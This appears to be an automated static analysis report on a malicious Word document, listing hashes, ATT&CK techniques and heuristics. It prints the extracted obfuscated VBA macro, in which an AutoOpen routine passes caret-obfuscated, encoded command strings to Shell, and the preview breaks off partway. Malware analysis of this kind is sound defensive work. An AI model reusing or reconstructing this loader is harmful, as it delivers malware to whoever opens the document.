Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 39f96b7821b40cf8…

MALICIOUS

Office (OLE)

Size: 79.2 KB
Created: 2018-08-31 08:01:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 637b935bfe58689f7f793c8271fa9426
SHA-1: b768cb358f79f9269128eb3d786b9b4d7e7c8269
SHA-256: 39f96b7821b40cf8aaaac8b96a84d60218e381fdb1f20bd8de657d11f75d6ba4
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The macro utilizes the Shell() function, indicating an attempt to run an external command or program. While the exact command is obfuscated, the presence of the Shell() call and the macro itself strongly suggests the execution of a secondary payload.

Heuristics (5)

  • VBA macros detected (severity: medium, 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (severity: critical) [OLE_VBA_SHELL]
    Shell() call in VBA.
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro.
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6881 bytes
SHA-256: 6b8f94fa7397bc3cc7bab361f680bdd8daeb8df6ad7abbe5828820c87b194511

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "JfmlbDuENB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()

On _
Error _
Resume _
Next
   Hour 56023 / mQUbkE
   Hour rAGSJr / GaFIa
   Hour hZObCD / oiFPGz * 90950 * vDdSYw
Shell KeyString(5 + 3 + 2 + 6 + 51) + AQwdvdwss + bwlawazoAo + WzUcci + jJUCs + WAqmjDhols + SNrBEWEj + sRtsiKzGQidGOq, 93 - 93
   Hour 88402 / KEbDYj
End Sub



Attribute VB_Name = "QEbuVoIviDT"
Function WzUcci()

On _
Error _
Resume _
Next
Hour 71677 / PadMB / 7413 * TjcYU
   Hour 45478 / YRfzQp / ljOnrY * pVrNw
UJSkvRrEfE = "md /V^:" + "^O/" + "C" + Chr(0 + 0 + 5 + 1 + 28) + "^s^e" + "^t ^i^D" + "6" + "=^AAC^A" + "g^" + "A" + "^A^" + "I^AAC" + "A^g^A^A" + "I"
Hour 63755 * cOLcoD
MSnQzpcaIZW = "A" + "^" + "AC^A^g^" + "A" + "^A^IAA" + "CA^g^A" + "^A^I" + "^AAC^A^" + "gA^AI^A" + "AC^AgAQ" + "^"
Hour FpZdzN / Tmptw
   Hour uGtGh * OPUrj
lYslRcdn = "fA" + "0^HA^7" + "BA" + "aA^MG" + "^A0BQY" + "^AM^G" + "A^" + "9B^" + "wO^A^" + "sG^A^h"
Hour NnhbH * ljnLXi
   Hour VknlOB * VvwbA
   Hour kDvpkm * slAGOu
   Hour 81577 / hzubQ / wHSrU / KShjCN
RNiYhRbV = "^" + "BQZ^A^I" + "^H^A^i" + "^BwOA" + "8^G" + "A^BB^w" + "Q^A^QC" + "A^g^AQ^" + "bAU^GA"
Hour 27826 * CcYXcV
   Hour ZGCNNY * vwjiBF
   Hour 57822 * FWRkF / 63081 * NTGzkM
pOmCjL = "^0B^Q" + "^SA0C" + "^Al^Bwa" + "^A8^" + "G^A^2^"
Hour AuKfpi / bSSzi * MYLwLR * DJosK
   Hour 89031 * ZCjab / BKjwXb * qRniRl
HJtGfmSRYTZ = "Bg^" + "b^A" + "^kEA" + "7^AQ" + "^KA8G" + "^A" + "B"
Hour mAFBdr / RVzkQ * PjXCi * 22213
   Hour 58749 / 71 / qHNrBK / DnZlQi
   Hour 51156 / JEPcX * ioCDLO / vUJmN
jbtBaHuHlP = "BwQA^QC" + "AgA^ALA" + "MG" + "ARBg" + "Z^" + "AQCAoA^" + "QZ" + "^Aw" + "^G^A" + "^" + "p^B" + "gR"
Hour HIwzE * pWjvvJ * JGWoGi * nvptB
   Hour zEHbw / rQzBBc
   Hour 87663 / NXrNMA * zEcoFi / WOqmBB
   Hour JPXPz / 49068
   Hour GhCKz / BbtrX * CJlvt / uPzPT
   Hour 79830 / wfwsEb
zPwSbpQWI = "^AQ" + "G" + "^" + "Ah" + "^B^" + "w^b" + "^Aw^G^A" + "u^Bw^" + "dA^8GA^"
Hour 17606 / loXLT * 5284 * FsHIID
   Hour rRHRMS / UGZbCP
   Hour 46324 * KIpKk
   Hour uUOjbX / jfCiiM
vwKzijRPbGa = "E" + "^B^" + "g^L^" + "AQ" + "HAv" + "^BQU" + "A^Q" + "CA^"
Hour qIUQms * 99565
   Hour 16970 / NnuUG
   Hour 27010 * bPhjQt * LQuZmI / sRsSD
cBzXdiwITC = "7^" + "B^Qe^" + "AI^HA" + "0^B" + "w^eAk" + "C" + "^ATB^w^" + "TA^M" + "^" + "HA" + "kA^A^I^"
Hour CvZMMk * pBQwz
DJQXHRIfJkJ = "A4GA" + "^pB^" + "A^I" + "^AM^" + "G^" + "ARBg^" + "Z" + "^A^QC" + "AoA"
WzUcci = UJSkvRrEfE + MSnQzpcaIZW + lYslRcdn + RNiYhRbV + pOmCjL + HJtGfmSRYTZ + jbtBaHuHlP + zPwSbpQWI + vwKzijRPbGa + cBzXdiwITC + DJQXHRIfJkJ
   Hour 29288 / sahab
End Function
Function jJUCs()

On _
Error _
Resume _
Next
Hour TNoqN / uvIQA * 56055 * 95058
   Hour szvcc * 77625
   Hour qnMmJ / 8365
   Hour 4230 * ZdfTMz
   Hour 96695 * bsJpIJ
NPWlqzwmiH = "^A" + "^" + "a" + "AMG^A" + "^hB^Q" + "^"
Hour 68058 * zMwjjp
   Hour 50986 * OsVWbP / 98136 / 11869
   Hour JBOfP / ztiZol / 68348 * lMkoWk
OFKjSVBFSR = "ZA^I^H^" + "AvBgZ" + "^A^sDA" + "n^" + "A^Q^ZAg" + "H^A^" + "l^Bg^L^" + "AcCArA^"
Hour 31100 / wBZmo * 70762 / rDaZjl
   Hour 67840 / jwmBBc
VcFbNRtHquu = "gSA" + "MF^A" + "p^B^A" + "^JAsCAn" + "^A^A^X" + "AcC^Ar^" + "A" + "^w^Y^A" + "^k" + "^G" + "^" + "A"
Hour PfKjAv * 71928 * 72320 / jNUNEt
   Hour iJVFbD * jAblO / WszCZ * THCio
   Hour AVSWss / EuzEi * 77388 / FAAUzW
LticoWv = "^s^B" + "^gYAU" + "^H^A^w^" + "Bg" + "OAYHA" + "^u" + "B^QZAQ" + "CA9AwbA" + "EE" + "A" + "D^BA^"
Hour ULfob / fihLhC
   Hour ditIQ / tvXldN * CKoXX / AzLNEi
JWoGkuwjQt = "J" + "^A^sD^" + "An^A" + "w^" + "M^A" + "gDA^4" + "A^wJA^" + "AC^" + "A^9^" + "A^AIA" + "o^E^" + "ATB^Qa^" + "A"
Hour 41086 * THYWj
   Hour 72203 * OGhbZ
   Hour 56230 / NXYDi * 9587 * XjYiIR
   Hour KOidUs * JMiTSV
DtDndXKPz = "^QCA^" + "7A^QK^" + "Ac" + "CA^AB^" + "w^J" + "^Ag" + "CA^0B^" + "Qa
... (truncated)